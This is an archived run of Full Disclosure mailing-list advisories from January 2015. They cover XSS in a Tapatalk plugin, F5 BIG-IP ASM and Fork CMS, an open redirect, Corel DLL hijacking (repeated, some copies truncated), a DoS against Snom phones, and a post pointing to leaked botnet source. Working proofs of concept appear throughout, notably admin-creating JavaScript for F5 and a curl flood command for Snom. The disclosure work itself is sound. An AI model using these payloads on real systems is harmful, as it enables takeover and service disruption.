[FD] [RT-SA-2014-015] Cross-site Scripting in Tapatalk Plugin for WoltLab Burning Board 4.0

2015-01-12 Thread RedTeam Pentesting GmbH
Advisory: Cross-site Scripting in Tapatalk Plugin for WoltLab Burning
  Board 4.0

RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability
in the Tapatalk plugin for the WoltLab Burning Board forum software,
which allows attackers to inject arbitrary JavaScript code via URL
parameters.


Details
===

Product: Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0
Affected Versions: = 1.0.0
Fixed Versions: 1.1.2
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://tapatalk.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-015
Advisory Status: published
CVE: CVE-2014-8869
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8869


Introduction


Tapatalk is an app built for interacting with discussion forums on
mobile devices. It differs from a forum’s mobile web skin in that it
offers the speed of a native app and a streamlined unified interface for
every forum a user subscribes to. Tapatalk also creates a unique
eco-system that allows forums to be searched and discovered by millions
of Tapatalk users which in turn promotes content, new memberships, and
interactions.

(from Tapatalk's Homepage)


More Details


The Tapatalk extension includes the PHP script welcome.php at the path

com.tapatalk.wbb4/files/mobiquo/smartbanner/welcome.php

which is accessible via the URL

http://www.example.com/mobiquo/smartbanner/welcome.php

on systems using the plugin. It outputs JavaScript code that includes
improperly encoded values from the two URL parameters app_android_id
and app_kindle_url. Depending on which parameters is used, one of
their values is assigned to the PHP variable $byo:


?php
[...]
else if (isset($_GET['app_android_id']))
{
  $app_android_id = $_GET['app_android_id'];
  if ($app_android_id  $app_android_id != '-1')
$byo = app_android_id=$app_android_id;
}
else if (isset($_GET['app_kindle_url']))
{
  $app_kindle_url = $_GET['app_kindle_url'];
  if ($app_kindle_url  $app_kindle_url != '-1')
$byo = app_kindle_url=$app_kindle_url;
}


Later the $byo variable is used to build a URL without URL encoding it
and the URL is used without further encoding in a script element:


?php
[...]
$ads_url = $protocol.'tapatalk.com/welcome_screen.php'
.'?referer='.urlencode($referer)
.'code='.urlencode($code)
.'board_url='.urlencode($board_url)
.'lang='.urlencode($lang)
.$byo
.'callback=?';
[...]
?[...]

script$.getJSON(?php echo $ads_url; ?,function(data){
[...]



Proof of Concept


The following URL can be used to demonstrate the vulnerability:

http://www.example.com/mobiquo/smartbanner/welcome.php
  ?app_kindle_url=);alert('RedTeam Pentesting');/script!--

The result is a notification showing the text RedTeam Pentesting.


Workaround
==

The PHP function urlencode() should be used to encode the $byo variable
before building a URL with it.


Fix
===

Update the plugin to version 1.1.2.


Security Risk
=

This security vulnerability is rated as a high risk. It allows to
execute arbitrary JavaScript code in users' browsers if they access URLs
prepared by attackers. This provides many different possibilities for
further attacks against these users. Since the plugin is used for a
bulletin board, the vulnerability could be exploited to display a fake
login page and obtain credentials from users or administrators. The
vulnerability also affects other web applications hosted on the same
domain.


Timeline


2014-10-20 Vulnerability identified
2014-10-29 CVE number requested
2014-11-14 CVE number assigned
2014-11-26 Vendor notified via https://tapatalk.com/security.php
2014-12-16 Vendor notified again, received reply from vendor
2014-12-16 Vulnerability patched in SCM [0]
2014-12-23 Updated plugin released by vendor [1]
2015-01-08 Vendor updated release notes to mention XSS [2]
2015-01-12 Advisory released


References
==

[0] 
https://github.com/tapatalk/tapatalk-wbb/commit/71024545904024cea9d04a887fdc64b9a9b85871
[1] 
https://github.com/tapatalk/tapatalk-wbb/commit/31472f6fcfffacd698b0c20809c4a8fb3c4f32f9
[2] https://support.tapatalk.com/threads/19540/#post-146253


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in

[FD] CVE-2014-8870: Arbitrary Redirect in Tapatalk Plugin for WoltLab Burning Board 4.0

2015-01-12 Thread RedTeam Pentesting GmbH
The Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0 prior to
version 1.1.2 allowed to redirect users to arbitrary URLs. This was possible by
specifying the target URL in the URL parameter board_url in URLs like the
following:

http://www.example.com/mobiquo/smartbanner/welcome.php?board_url=https://www.redteam-pentesting.de

CVE-2014-8870 was assigned to this issue.

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpJHKIMmxNYT.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Corel Software DLL Hijacking

2015-01-12 Thread CORE Advisories Team
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Corel Software DLL Hijacking



1. *Advisory Information*

Title: Corel Software DLL Hijacking
Advisory ID: CORE-2015-0001
Advisory URL:
http://www.coresecurity.com/advisories/corel-software-dll-hijacking
Date published: 2015-01-12
Date of last update: 2015-01-06
Vendors contacted: Corel
Release mode: User release



2. *Vulnerability Information*

Class: Uncontrolled Search Path Element [CWE-427]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2014-8393, CVE-2014-8394, CVE-2014-8395, CVE-2014-8396,
CVE-2014-8397, CVE-2014-8398



3. *Vulnerability Description*


Corel [1] has developed a wide range of products that includes graphics, 
painting, 
photo, video and office software.(CorelDRAW,Corel Photo-Paint, Corel PaintShop 
Pro, Corel CAD,
Corel Painter, Corel PDF Fusion, Corel VideoStudio and Corel FastFlick among 
others)



When a file associated with the Corel software is opened, the directory of that 
document
is first used to locate DLLs, which could allow an attacker to execute 
arbitrary commands
by inserting malicious DLLs into the same directory as the document.



4. *Vulnerable packages*

   . Corel DRAW X7 [2]
   . Corel Photo-Paint X7 [3]
   . Corel PaintShop Pro X7 [7]
   . Corel CAD 2014 [4]
   . Corel Painter 2015 [5]
   . Corel PDF Fusion [6]
   . Corel VideoStudio PRO X7 [8]
   . Corel FastFlick [9]

Other versions could be affected too, but they were not checked.


5. *Vendor Information, Solutions and Workarounds*


Given that this is a client-side vulnerability, affected users should avoid 
opening untrusted
files whose extensions are associated with Corel software and contain any of 
the DLL files detailed below.
  


6. *Credits*


This vulnerability was discovered and researched by Marcos Accossatto from Core 
Security
Exploit Writers Team. The publication of this advisory was coordinated by 
Joaquin Rodriguez
Varela from Core Advisories Team.



7. *Technical Description / Proof of Concept Code*

[CVE-2014-8393] This vulnerability is caused by a DLL Hijacking when a file
associated with any of the following Corel applications is executed (CorelDRAW 
X7, Corel
 Photo-Paint X7, Corel PaintShop Pro X7, Corel Painter 2015 or Corel PDF 
Fusion). The 
affected application should not be running for the vulnerability to work. The 
Corel 
software looks for a DLL file called wintab32.dll and does not control its 
path, therefore
 allowing to copy a malicious DLL file with the same name inside the folder 
where the 
associated file is. The DLL is executed within the context of the application.


[CVE-2014-8394] This vulnerability is caused by a DLL Hijacking when a file
associated with Corel CAD 2014 is executed. Corel CAD 2014 should not be 
running before
the associated file is executed for the vulnerability to work.
Corel CAD looks for a DLL file called FxManagedCommands_3.08_9.tx or 
TD_Mgd_3.08_9.dll
and does not control their path, therefore allowing to copy a malicious DLL 
file with the
same name of either DLL inside the folder where the associated file is. The DLL 
is
executed within the context of the application.


[CVE-2014-8395] This vulnerability is caused by a DLL Hijacking when a file 
associated with
Corel Painter 2015 is executed. Corel Painter 2015 should not be running before 
the associated
file is executed for the vulnerability to work. Corel Painter looks for a DLL 
file called 
wacommt.dll and does not control its path, therefore allowing to copy a 
malicious DLL file 
with the same name inside the folder where the associated file is. The DLL is 
executed within
the context of the application.


[CVE-2014-8396] This vulnerability is caused by a DLL Hijacking when a file 
associated with 
Corel PDF Fusion is executed. Corel PDF Fusion should not be running before the 
associated 
file is executed for the vulnerability to work. Corel PDF Fusion looks for a 
DLL file called
quserex.dll and does not control its path, therefore allowing to copy a 
malicious DLL file 
with the same name inside the folder where the associated file is. The DLL is 
executed within
the context of the application.


[CVE-2014-8397] This vulnerability is caused by a DLL Hijacking when a file 
associated with 
Corel VideoStudio PRO X7 or Corel FastFlix is executed. Corel Video Studio or 
Corel FastFlix
should not be running before the associated file is executed for the 
vulnerability to work. 
Corel PDF Fusion looks for a DLL file called u32ZLib.dll and does not control 
its path, 
therefore allowing to copy a malicious DLL file with the same name inside the 
folder where the
associated file is. The DLL is executed within the context of the application.


[CVE-2014-8398] This vulnerability is caused by a DLL Hijacking when a file 
associated with 
Corel FastFlick is executed. Corel FastFlick should not be running before the 
associated file
is executed 

[FD] Corel Software DLL Hijacking

2015-01-12 Thread CORE Advisories Team
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Corel Software DLL Hijacking



1. *Advisory Information*

Title: Corel Software DLL Hijacking
Advisory ID: CORE-2015-0001
Advisory URL:
http://www.coresecurity.com/advisories/corel-software-dll-hijacking
Date published: 2015-01-12
Date of last update: 2015-01-06
Vendors contacted: Corel
Release mode: User release



2. *Vulnerability Information*

Class: Uncontrolled Search Path Element [CWE-427]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2014-8393, CVE-2014-8394, CVE-2014-8395, CVE-2014-8396,
CVE-2014-8397, CVE-2014-8398



3. *Vulnerability Description*


Corel [1] has developed a wide range of products that includes graphics,
painting,
photo, video and office software.(CorelDRAW,Corel Photo-Paint, Corel
PaintShop Pro, Corel CAD,
Corel Painter, Corel PDF Fusion, Corel VideoStudio and Corel FastFlick
among others)
   


When a file associated with the Corel software is opened, the directory
of that document
is first used to locate DLLs, which could allow an attacker to execute
arbitrary commands
by inserting malicious DLLs into the same directory as the document.
   


4. *Vulnerable packages*

   . Corel DRAW X7 [2]
   . Corel Photo-Paint X7 [3]
   . Corel PaintShop Pro X7 [7]
   . Corel CAD 2014 [4]
   . Corel Painter 2015 [5]
   . Corel PDF Fusion [6]
   . Corel VideoStudio PRO X7 [8]
   . Corel FastFlick [9]

Other versions could be affected too, but they were not checked.


5. *Vendor Information, Solutions and Workarounds*


Given that this is a client-side vulnerability, affected users should
avoid opening untrusted
files whose extensions are associated with Corel software and contain
any of the DLL files detailed below.
 


6. *Credits*


This vulnerability was discovered and researched by Marcos Accossatto
from Core Security
Exploit Writers Team. The publication of this advisory was coordinated
by Joaquin Rodriguez
Varela from Core Advisories Team.
   


7. *Technical Description / Proof of Concept Code*

[CVE-2014-8393] This vulnerability is caused by a DLL Hijacking when a file
associated with any of the following Corel applications is executed
(CorelDRAW X7, Corel
 Photo-Paint X7, Corel PaintShop Pro X7, Corel Painter 2015 or Corel PDF
Fusion). The
affected application should not be running for the vulnerability to
work. The Corel
software looks for a DLL file called wintab32.dll and does not control
its path, therefore
 allowing to copy a malicious DLL file with the same name inside the
folder where the
associated file is. The DLL is executed within the context of the
application.
   

[CVE-2014-8394] This vulnerability is caused by a DLL Hijacking when a file
associated with Corel CAD 2014 is executed. Corel CAD 2014 should not be
running before
the associated file is executed for the vulnerability to work.
Corel CAD looks for a DLL file called FxManagedCommands_3.08_9.tx or
TD_Mgd_3.08_9.dll
and does not control their path, therefore allowing to copy a malicious
DLL file with the
same name of either DLL inside the folder where the associated file is.
The DLL is
executed within the context of the application.
   

[CVE-2014-8395] This vulnerability is caused by a DLL Hijacking when a
file associated with
Corel Painter 2015 is executed. Corel Painter 2015 should not be running
before the associated
file is executed for the vulnerability to work. Corel Painter looks for
a DLL file called
wacommt.dll and does not control its path, therefore allowing to copy
a malicious DLL file
with the same name inside the folder where the associated file is. The
DLL is executed within
the context of the application.
   

[CVE-2014-8396] This vulnerability is caused by a DLL Hijacking when a
file associated with
Corel PDF Fusion is executed. Corel PDF Fusion should not be running
before the associated
file is executed for the vulnerability to work. Corel PDF Fusion looks
for a DLL file called
quserex.dll and does not control its path, therefore allowing to copy
a malicious DLL file
with the same name inside the folder where the associated file is. The
DLL is executed within
the context of the application.
   

[CVE-2014-8397] This vulnerability is caused by a DLL Hijacking when a
file associated with
Corel VideoStudio PRO X7 or Corel FastFlix is executed. Corel Video
Studio or Corel FastFlix
should not be running before the associated file is executed for the
vulnerability to work.
Corel PDF Fusion looks for a DLL file called u32ZLib.dll and does not
control its path,
therefore allowing to copy a malicious DLL file with the same name
inside the folder where the
associated file is. The DLL is executed within the context of the
application.
   

[CVE-2014-8398] This vulnerability is caused by a DLL Hijacking when a
file associated with
Corel FastFlick is executed. Corel FastFlick should not be running
before the associated file
is executed for the vulnerability to work. Corel FastFlick looks for 

[FD] Snom SIP phones denial of service through HTTP

2015-01-12 Thread kape...@googlemail.com
Snom SIP phones (www.snom.com) have a builtin HTTP/HTTPS configuration
interface, which is enabled by default.

By making a single HTTP POST request all available memory (and CPU) can be
exhausted, resulting in a reboot of the phone.
This even works if the HTTP/HTTPS interface is protected by username and
password (probably the credentials are checked a few more lines later when
the complete request has been received).

Affected models: MP, 3XX, 7XX, 8XX (i didnt have any of the other models to
test)
Affected firmwares: latest stable, latest beta (most likely some others too)
Workaround: Disable HTTP/HTTPS interface completely.

Poc:

dd if=/dev/zero bs=1M count=32 | curl http://IP_OF_PHONE
http://ip_of_phone/ --data-binary @-

P.S. Just if you are wondering I did not notify the vendor about this.
Almost two years ago i reported multiple vulnerabilities directly to the
vendor (including the possibility to install arbitrary software on the
device), but not much has changed since then.

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Stored XSS Vulnerability in F5 BIG-IP Application Security Manager

2015-01-12 Thread Peter Lapp
Details
===

Product: F5 BIG-IP Application Security Manager (ASM)
Vulnerability: Cross Site Scripting
Author: Peter Lapp, lapp...@gmail.com
CVE: None assigned
Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Likely 11.4.x-11.5.x.
Fixed Version: 11.6



Summary
===

The F5 ASM is a web application firewall designed to protect web
applications from attacks. It allows for a custom HTML page to be displayed
to end users when they trigger a violation. The configuration page for the
custom response contains a text input for HTML and a Show button that
allows the editor to preview the page. This functionality is vulnerable to
Cross Site Scripting.



Technical Details and POC
=

The HTML entered into the Response Body area is not sandboxed, which
allows a malicious user to include JavaScript that would run in the context
of the management console whenever a user clicks the Show button. The
user could use XHR to bypass CSRF protections and perform commands on
behalf of anyone that clicks the Show button.

Scenario:

1. A restricted user (Application Security Editor role) logs into the
management console of the ASM, enters Javascript to add a new user (see
below) into the Response Body input, and saves the page.

2. An admin logs on and previews the block page via the Show button.

3. The JS runs in the background, executes the XHR, and adds a new admin
user. The restricted user now has an admin account.

POC (Sloppy, I know):
script
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4)
{
var postrequest = new XMLHttpRequest();
xmlForm = xmlhttp.responseXML.getElementById('myform');
var timenowvalue = encodeURIComponent(xmlForm.elements['_timenow'].value);
var timebeforevalue =
encodeURIComponent(xmlForm.elements['_timenow_before'].value);
var bufvalue = encodeURIComponent(xmlForm.elements['_bufvalue'].value);
var bufvaluebefore =
encodeURIComponent(xmlForm.elements['_bufvalue_before'].value);
var parameters =
_timenow=+timenowvalue+_timenow_before=+timebeforevalue+_bufvalue=+bufvalue+_bufvalue_before=+bufvaluebefore+_form_holder_opener_=handler=%2Ftmui%2Fsystem%2Fuser%2Fcreatehandler_before=%2Ftmui%2Fsystem%2Fuser%2FcreateshowObjList=shell_with_bashshowObjList_before=hideObjList=partition_row%2Cshell_no_bashhideObjList_before=enableObjList=enableObjList_before=disableObjList=disableObjList_before=_bufvalue_validation=NO_VALIDATIONcom.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Fuser%2Fcreatecom.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Fuser%2Fcreatelinked_add_id=linked_add_id_before=exit_page=%2Ftmui%2Fsystem%2Fuser%2Flist.jspexit_page_before=%2Ftmui%2Fsystem%2Fuser%2Flist.jspuser_role_before=900user_role_before_before=900form_page=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3Fform_page_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3Fname=testadminname_before=name_validation=NO_VALIDATIONname_required=1passwd=testing123passw
 
d_before=passwd_validation=com.f5.form.PasswordValidatorpasswd_validationparam1=passwd_confirmpasswd_required=1passwd_confirm=testing123passwd_confirm_before=passwd_confirm_validation=NO_VALIDATIONpasswd_confirm_required=1user_role=0user_role_before=900shell_with_bash=bashshell_with_bash_before=disableexit_button_before=Cancelrepeat_before=Repeatfinished=Finishedfinished_before=Finished;
postrequest.open(POST, /tmui/Control/form, true)
postrequest.setRequestHeader(Content-type,
application/x-www-form-urlencoded)
postrequest.send(parameters)
}
}
xmlhttp.open(GET, /tmui/Control/jspmap/tmui/system/user/create.jsp,
true);
xmlhttp.responseType = document;
xmlhttp.send();
/script



Solution


Upgrade to 11.6.
The vendor indicated the patch would not be backported to previous versions.


Timeline

06/09/14 - Reported issue to vendor
06/18/14 - Vendor confirms the vulnerability
07/18/14 - Vendor confirms the fix will be included in 11.6 and an SOL
would be created for the vulnerability
10/24/14 - Vendor confirms the fix was included in 11.6.0 but an SOL was
not created and the fix would not be backported.
01/12/14 - Released vulnerability info.

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Lizard Stresser rekt

2015-01-12 Thread Robert Cavanaugh
Hi FD,

I'm sure you're all sick to death of hearing about Lizard Squad and the
skid marks they're leaving all over the place, so we'll make this brief:
Lizard Squad has been rekt and the source code for their bots is now
available for your viewing pleasure.

https://github.com/pop-pop-ret/lizkebab

0wned by: Chippy1337, @packetprophet

If you lulz'd, send BTC to 129UQoB3JvZg3iDERYZiXeHPkwT1iJF8u4
https://blockchain.info/address/129UQoB3JvZg3iDERYZiXeHPkwT1iJF8u4

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] XSS Vulnerability in Fork CMS 3.8.3

2015-01-12 Thread ITAS Team
# Exploit Title: XSS Vulnerability in Fork CMS 3.8.3

# Google Dork: N/A

# Date: 12/26/2014

# Exploit Author: Le Ngoc phi (phi.n...@itas.vn) and ITAS Team (www.itas.vn)

# Vendor Homepage: http://www.fork-cms.com

# Software Link: http://www.fork-cms.com/blog/detail/fork-3.8.4-released

# Version: Fork 3.8.3

# Tested on: N/A

# CVE : CVE-2014-9470 

 

 

::VULNERABILITY DETAIL::

- Vulnerable parameter:  q_widget

- Vulnerable file:   src/Frontend/Modules/Search/Actions/Index.php

- Vulnerable function:   loadForm()

 

- Attack vector:  

  

GET
/en/search?form=searchq_widget=onmouseover=alert('XSS')submit=Search
HTTP/1.1

Host: forkcms.local

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101
Firefox/34.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Cookie: track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B;
__utma=23748525.1232410121.1415937482.1419392332.1419480017.3;
__utmz=23748525.1419480017.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic
|utmctr=(not%20provided);
track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B;
frontend_language=s%3A2%3A%22en%22%3B; _ga=GA1.2.1232410121.1415937482;
PHPSESSID=gailpg881ubvtsmroh2p1bfqn5

Connection: keep-alive

 

- Vulnerable code:

private function loadForm()

{

// create form

$this-frm = new FrontendForm('search', null, 'get', null, false);

 

// could also have been submitted by our widget

if (!\SpoonFilter::getGetValue('q', null, '')) {

$_GET['q'] = \SpoonFilter::getGetValue('q_widget', null, '');

}

 

// create elements

$this-frm-addText(

'q',

null,

255,

'inputText liveSuggest autoComplete',

'inputTextError liveSuggest autoComplete'

);

 

// since we know the term just here we should set the canonical url
here

$canonicalUrl = SITE_URL .
FrontendNavigation::getURLForBlock('Search');

if (isset($_GET['q'])  $_GET['q'] != '') {

$canonicalUrl .= '?q=' . $_GET['q'];

}

$this-header-setCanonicalUrl($canonicalUrl);

}

 

 

 

::DISCLOSURE::

- 12/25/2014: Detected vulnerability

- 12/25/2014: Inform vendor and the vendor confirmed

- 12/26/2014: Vendor releases patch

- 12/26/2014: ITAS Team publishes information

 

::REFERENCE::

-
http://www.itas.vn/news/itas-team-found-out-a-cross-site-scripting-vulnerabi
lity-in-fork-cms-70.html

- https://github.com/forkcms/forkcms/issues/1018s

-
https://github.com/forkcms/forkcms/commit/4a7814762adf4f56f932d95146c7e4126d
872114

 

::DISCLAIMER::

THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,
AND AT THE USER'S OWN RISK.





ITAS Team


ITAS Corp.   Be protected with us 
Office : 24 Dang Thai Mai St., Ward 7, Phu Nhuan District, HCMC.
Tel : +84 - 8 - 38931952   Hotline :
0903445711
Email :   mailto:i...@itas.vn i...@itas.vn
http://www.itas.vn/ www.itas.vn

 

 


___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Corel Software DLL Hijacking

2015-01-12 Thread CORE Security Technologies Advisories-team (jrv)
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Corel Software DLL Hijacking



1. *Advisory Information*

Title: Corel Software DLL Hijacking
Advisory ID: CORE-2015-0001
Advisory URL:
http://www.coresecurity.com/advisories/corel-software-dll-hijacking
Date published: 2015-01-12
Date of last update: 2015-01-06
Vendors contacted: Corel
Release mode: User release



2. *Vulnerability Information*

Class: Uncontrolled Search Path Element [CWE-427]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2014-8393, CVE-2014-8394, CVE-2014-8395, CVE-2014-8396,
CVE-2014-8397, CVE-2014-8398



3. *Vulnerability Description*


  Corel [1] has developed a wide range of products that
  includes graphics, painting, photo, video and office software.
(CorelDRAW,Corel
  Photo-Paint, Corel PaintShop Pro, Corel CAD, Corel Painter, Corel PDF
  Fusion, Corel VideoStudio and Corel FastFlick among others)



  When a file associated with the Corel software is opened, the
directory of that
  document is first used to locate DLLs, which could allow an
attacker to execute
  arbitrary commands by inserting malicious DLLs into the same
directory as the
  document.



4. *Vulnerable packages*

   . Corel DRAW X7 [2]
   . Corel Photo-Paint X7 [3]
   . Corel PaintShop Pro X7 [7]
   . Corel CAD 2014 [4]
   . Corel Painter 2015 [5]
   . Corel PDF Fusion [6]
   . Corel VideoStudio PRO X7 [8]
   . Corel FastFlick [9]

Other versions could be affected too, but they were not checked.


5. *Vendor Information, Solutions and Workarounds*


Given that this is a client-side vulnerability, affected users
should avoid
opening untrusted files whose extensions are associated with
Corel software
and contain any of the DLL files detailed below.
  


6. *Credits*


  This vulnerability was discovered and researched by Marcos
Accossatto from Core Security
  Exploit Writers Team. The publication of this advisory was
coordinated by
  Joaquin Rodriguez Varela from Core Advisories Team.



7. *Technical Description / Proof of Concept Code*

[CVE-2014-8393] This vulnerability is caused by a DLL Hijacking when a file
  associated with any of the following Corel applications is
executed (CorelDRAW X7, Corel
  Photo-Paint X7, Corel PaintShop Pro X7, Corel Painter 2015 or
Corel PDF Fusion). The
  affected application should not be running for the vulnerability
to work. The Corel
  software looks for a DLL file called wintab32.dll and does not
control its path,
  therefore allowing to copy a malicious DLL file with the same name
inside the folder
  where the associated file is. The DLL is executed within the
context of the application.


[CVE-2014-8394] This vulnerability is caused by a DLL Hijacking when a file
  associated with Corel CAD 2014 is executed. Corel CAD 2014 should
not be running before
  the associated file is executed for the vulnerability to work.
Corel CAD looks for a DLL
  file called FxManagedCommands_3.08_9.tx or TD_Mgd_3.08_9.dll
and does not control their
  path, therefore allowing to copy a malicious DLL file with the
same name of either DLL
  inside the folder where the associated file is. The DLL is
executed within the context of
  the application.


[CVE-2014-8395] This vulnerability is caused by a DLL Hijacking when a file
  associated with Corel Painter 2015 is executed. Corel Painter 2015
should not be running
  before the associated file is executed for the vulnerability to
work. Corel Painter looks
  for a DLL file called wacommt.dll and does not control its path,
therefore allowing to
  copy a malicious DLL file with the same name inside the folder
where the associated file
  is. The DLL is executed within the context of the application.


[CVE-2014-8396] This vulnerability is caused by a DLL Hijacking when a file
  associated with Corel PDF Fusion is executed. Corel PDF Fusion
should not be running
  before the associated file is executed for the vulnerability to
work. Corel PDF Fusion
  looks for a DLL file called quserex.dll and does not control its
path, therefore
  allowing to copy a malicious DLL file with the same name inside
the folder where the
  associated file is. The DLL is executed within the context of the
application.


[CVE-2014-8397] This vulnerability is caused by a DLL Hijacking when a file
  associated with Corel VideoStudio PRO X7 or Corel FastFlix is
executed. Corel Video
  Studio or Corel FastFlix should not be running before the
associated file is executed
  for the vulnerability to work. Corel PDF Fusion looks for a DLL
file called u32ZLib.dll
  and does not control its path, therefore allowing to copy a
malicious DLL file with the
  same name inside the folder where the associated file is. The DLL
is executed within the
  context of the 

[FD] [Corrected] Stored XSS Vulnerability in F5 BIG-IP Application Security Manager

2015-01-12 Thread Peter Lapp
Edit: Corrected the date in the timeline from 01/12/14 to 01/12/15.



Details
===

Product: F5 BIG-IP Application Security Manager (ASM)
Vulnerability: Cross Site Scripting
Author: Peter Lapp, lapp...@gmail.com
CVE: None assigned
Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Likely 11.4.x-11.5.x.
Fixed Version: 11.6



Summary
===

The F5 ASM is a web application firewall designed to protect web
applications from attacks. It allows for a custom HTML page to be
displayed to end users when they trigger a violation. The
configuration page for the custom response contains a text input for
HTML and a Show button that allows the editor to preview the page.
This functionality is vulnerable to Cross Site Scripting.



Technical Details and POC
=

The HTML entered into the Response Body area is not sandboxed, which
allows a malicious user to include JavaScript that would run in the
context of the management console whenever a user clicks the Show
button. The user could use XHR to bypass CSRF protections and perform
commands on behalf of anyone that clicks the Show button.

Scenario:

1. A restricted user (Application Security Editor role) logs into the
management console of the ASM, enters Javascript to add a new user
(see below) into the Response Body input, and saves the page.

2. An admin logs on and previews the block page via the Show button.

3. The JS runs in the background, executes the XHR, and adds a new
admin user. The restricted user now has an admin account.

POC (Sloppy, I know):
script
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange=
function()
{
if (xmlhttp.readyState==4)
{
var postrequest = new XMLHttpRequest();
xmlForm = xmlhttp.responseXML.getElementById('myform');
var timenowvalue = encodeURIComponent(xmlForm.elements['_timenow'].value);
var timebeforevalue =
encodeURIComponent(xmlForm.elements['_timenow_before'].value);
var bufvalue = encodeURIComponent(xmlForm.elements['_bufvalue'].value);
var bufvaluebefore =
encodeURIComponent(xmlForm.elements['_bufvalue_before'].value);
var parameters =
_timenow=+timenowvalue+_timenow_before=+timebeforevalue+_bufvalue=+bufvalue+_bufvalue_before=+bufvaluebefore+_form_holder_opener_=handler=%2Ftmui%2Fsystem%2Fuser%2Fcreatehandler_before=%2Ftmui%2Fsystem%2Fuser%2FcreateshowObjList=shell_with_bashshowObjList_before=hideObjList=partition_row%2Cshell_no_bashhideObjList_before=enableObjList=enableObjList_before=disableObjList=disableObjList_before=_bufvalue_validation=NO_VALIDATIONcom.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Fuser%2Fcreatecom.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Fuser%2Fcreatelinked_add_id=linked_add_id_before=exit_page=%2Ftmui%2Fsystem%2Fuser%2Flist.jspexit_page_before=%2Ftmui%2Fsystem%2Fuser%2Flist.jspuser_role_before=900user_role_before_before=900form_page=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3Fform_page_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3Fname=testadminname_before=name_validation=NO_VALIDATIONname_required=1passwd=testing123passw
 
d_before=passwd_validation=com.f5.form.PasswordValidatorpasswd_validationparam1=passwd_confirmpasswd_required=1passwd_confirm=testing123passwd_confirm_before=passwd_confirm_validation=NO_VALIDATIONpasswd_confirm_required=1user_role=0user_role_before=900shell_with_bash=bashshell_with_bash_before=disableexit_button_before=Cancelrepeat_before=Repeatfinished=Finishedfinished_before=Finished;
postrequest.open(POST, /tmui/Control/form, true)
postrequest.setRequestHeader(Content-type,
application/x-www-form-urlencoded)
postrequest.send(parameters)
}
}
xmlhttp.open(GET, /tmui/Control/jspmap/tmui/system/user/create.jsp, true);
xmlhttp.responseType = document;
xmlhttp.send();
/script



Solution


Upgrade to 11.6.
The vendor indicated the patch would not be backported to previous versions.


Timeline

06/09/14 - Reported issue to vendor
06/18/14 - Vendor confirms the vulnerability
07/18/14 - Vendor confirms the fix will be included in 11.6 and an SOL
would be created for the vulnerability
10/24/14 - Vendor confirms the fix was included in 11.6.0 but an SOL
was not created and the fix would not be backported.
01/12/15 - Released vulnerability info.

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
